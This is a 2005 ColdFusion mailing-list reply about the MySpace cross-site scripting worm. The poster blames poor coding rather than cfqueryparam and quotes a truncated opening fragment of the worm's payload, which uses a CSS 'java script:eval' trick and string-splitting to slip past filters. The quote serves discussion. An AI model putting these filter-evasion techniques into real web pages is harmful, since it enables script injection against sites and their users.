I don't think myspace.com's related problem has anything to do with <cfqueryparam>... I think this is a bad coding, that's all...
Here's piece of the <http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391>self-propagating cross-site scripting (XSS) <http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391>worm code: <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}} ................. taken from http://namb.la/popular/tech.html Rizal masrizal.com At 12:52 PM 18/10/2005, you wrote: >Can we Readers-Digest this saga and spill to the masses that these >guys can't spell cfqueryparam? just curious as I'm not inclined to >read this saga unless someone can show me a reason for same. Not so >much a smart opinion as a late nite one... tired and not ready to give >credence to a new threat that sounds like old news. > >-- >--mattRobertson-- >Janitor, MSB Web Systems >mysecretbase.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Find out how CFTicket can increase your company's customer support efficiency by 100% http://www.houseoffusion.com/banners/view.cfm?bannerid=49 Message: http://www.houseoffusion.com/lists.cfm/link=i:4:221297 Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4 Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4 Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4 Donations & Support: http://www.houseoffusion.com/tiny.cfm/54
